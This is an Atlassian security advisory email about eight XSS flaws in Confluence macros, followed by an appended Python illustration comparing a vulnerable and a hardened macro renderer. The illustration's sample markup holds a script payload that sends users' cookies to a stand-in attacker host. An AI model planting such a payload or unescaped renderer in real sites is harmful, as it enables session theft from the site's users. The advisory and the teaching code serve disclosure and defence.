Security Alert: Atlassian Confluence

Subject:   Security Alert: Atlassian Confluence
From:   Atlassian No-Reply <noreply at mailer dot atlassian dot com>
Date:   18 January 2011 00:01


We are writing to inform you of a number of newly-discovered security vulnerabilities in Confluence. These security vulnerabilities have a severity level of high. To fix these vulnerabilities, you should follow the instructions in the security advisory below. Enterprise Hosted customers should request an upgrade by raising a support request at http://support.atlassian.com. JIRA Studio is not vulnerable to any of the issues described in this advisory.
 
Atlassian is committed to improving product security. The vulnerabilities listed in this advisory have been discovered by Atlassian, unless noted otherwise. The reporter may also have requested that we do not credit them.
 
For your convenience, we have included the entire security advisory in this email. To view the online version of this security advisory, please go to http://confluence.atlassian.com/x/HgdrDQ.
 
If you have any questions or concerns about this security vulnerability or about our policy of disclosure of security vulnerabilities, please visit our page on Atlassian security policies (http://confluence.atlassian.com/display/Support/Atlassian+Security+Policies) or raise a support request at http://support.atlassian.com/.
 
 
*** Security Advisory ***
 
 
*XSS Vulnerabilities in Various Confluence Macros*
 
Severity -- Atlassian rates these vulnerabilities as high, according to the scale published in our documentation (http://confluence.atlassian.com/display/DOC/Severity+Levels+for+Security+Issues). The scale allows us to rank a vulnerability as critical, high, moderate or low.
 
Risk Assessment -- We have identified and fixed a number of cross-site scripting (XSS) vulnerabilities which may affect Confluence instances, including publicly available instances (that is, internet-facing servers). XSS vulnerabilities potentially allow an attacker to embed their own JavaScript into a Confluence page. You can read more about XSS attacks at cgisecurity.com (http://www.cgisecurity.com/articles/xss-faq.shtml), The Web Application Security Consortium (http://projects.webappsec.org/Cross-Site+Scripting) and other places on the web.
 
Vulnerability -- The list below describes the Confluence macros and Confluence versions affected by the XSS vulnerabilities.
 
1) Vulnerability in Code macro, affecting Confluence 2.7 -- 3.4.
See issue http://jira.atlassian.com/browse/CONF-21098.
 
2) Vulnerability in Attachments macro, affecting Confluence 3.3 -- 3.4.
See issue http://jira.atlassian.com/browse/CONF-21099.
 
3) Vulnerability in Bookmarks macro, affecting Confluence 3.1 -- 3.4.3.
See issue http://jira.atlassian.com/browse/CONF-21390.
 
4) Vulnerability in Global Reports macro, affecting Confluence 2.7 -- 3.4.3.
See issue http://jira.atlassian.com/browse/CONF-21391.
 
5) Vulnerability in Recently Updated macro, affecting Confluence 3.0 -- 3.4.3.
See issue http://jira.atlassian.com/browse/CONF-21392.
 
6) Vulnerability in Pagetree macro, affecting Confluence 2.7 -- 3.4.3.
See issue http://jira.atlassian.com/browse/CONF-21393.
 
7) Vulnerability in Create Space Button macro, affecting Confluence 2.7 -- 3.4.3.
See issue http://jira.atlassian.com/browse/CONF-21394.
 
8) Vulnerability in Documentation Link macro, affecting Confluence 2.7 -- 3.4.5.
See issue http://jira.atlassian.com/browse/CONF-21508.
 
Our thanks to dave b, who reported the vulnerability in the Documentation Link macro. We fully support the reporting of vulnerabilities and we appreciate it when people work with us to identify and solve the problem.
 
Risk Mitigation -- We recommend that you upgrade your Confluence installation to fix these vulnerabilities. Alternatively, if you are not in a position to upgrade immediately and you judge it necessary, you can disable public signup to your wiki until you have applied the necessary patch or upgrade. For even tighter control, you could restrict access to trusted groups.
 
Fix -- Confluence 3.4.6 fixes these issues. For a full description of this release, see the release notes (http://confluence.atlassian.com/display/DOC/Confluence+3.4.6+Release+Notes). You can download the latest version of Confluence from the download centre (http://www.atlassian.com/software/confluence/ConfluenceDownloadCenter.jspa).
 
Patches -- If for some reason you cannot upgrade to the latest version of Confluence, you can apply patches to fix the vulnerabilities described in this security advisory. The patches are attached to the relevant issues, as listed above.
 
 
Securely yours,
 
Atlassian
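Editor's note on the Risk Assessment section above: the advisory explains that an XSS flaw lets an attacker embed their own JavaScript in a Confluence page, but does not show the mechanism. The block below is an added illustration, not Confluence's code and not the actual defect in any macro listed in the advisory. It models a generic wiki-macro renderer (hypothetical macro name "box", hypothetical parameter "title", constructed sample markup, constructed host name attacker.example) that writes a macro parameter into HTML unescaped, beside the same renderer with HTML escaping applied to every untrusted value.

```python
"""Generic model of the macro-parameter XSS class described in the advisory.

Added illustration only: the macro name, parameter name, markup syntax and
sample payload are all assumptions, not Confluence's real macro code or
the real flaw in the macros the advisory lists.
"""
import html
import re

# Constructed sample: wiki markup in which the "title" parameter of a
# hypothetical "box" macro carries a script payload. The double quote at the
# start of the payload is what breaks out of the HTML attribute when the
# value is interpolated unescaped.
SAMPLE_MARKUP = (
    '{box:title=Release notes"><script>'
    'document.location="http://attacker.example/?c="+document.cookie'
    '</script>}Body text{box}'
)

# {name:params}body{name}  -- assumed macro syntax for this illustration.
MACRO_RE = re.compile(r'\{(\w+)(?::([^}]*))?\}(.*?)\{\1\}', re.S)


def parse_params(raw):
    """Split 'a=1|b=2' into a dict. Values are attacker-controlled text."""
    params = {}
    if not raw:
        return params
    for part in raw.split('|'):
        key, _, value = part.partition('=')  # split on the first '=' only
        params[key.strip()] = value
    return params


def render_vulnerable(title, body):
    """Vulnerable form: parameter and body written straight into the HTML.

    A '"' in the title closes the attribute, and the '<script>' that follows
    is emitted verbatim, so the browser executes it in the wiki's origin.
    """
    return '<div class="box" title="%s">%s</div>' % (title, body)


def render_hardened(title, body):
    """Hardened form: every untrusted value is HTML-escaped before output.

    html.escape(quote=True) turns ", <, > and & into entities, so the value
    cannot terminate the attribute or open a new element.
    """
    return '<div class="box" title="%s">%s</div>' % (
        html.escape(title, quote=True),
        html.escape(body, quote=True),
    )


def render_page(markup, renderer):
    """Expand every macro in the markup with the given renderer."""
    def expand(match):
        _name, raw_params, body = match.groups()
        params = parse_params(raw_params)
        return renderer(params.get('title', ''), body)
    return MACRO_RE.sub(expand, markup)


def contains_raw_script(rendered_html):
    """Crude check for the demonstration: is a literal <script> tag present?"""
    return re.search(r'<script\b', rendered_html, re.I) is not None


if __name__ == '__main__':
    for label, renderer in (('vulnerable', render_vulnerable),
                            ('hardened', render_hardened)):
        out = render_page(SAMPLE_MARKUP, renderer)
        print('%-10s script tag emitted: %s' % (label, contains_raw_script(out)))
        print('  ', out)
```

The point of the pair is that the fix is output encoding at the point where the parameter is written into HTML, not input filtering of the markup: the same escaped value is safe in an attribute and in element content, whereas a blocklist on "<script" is trivially bypassed.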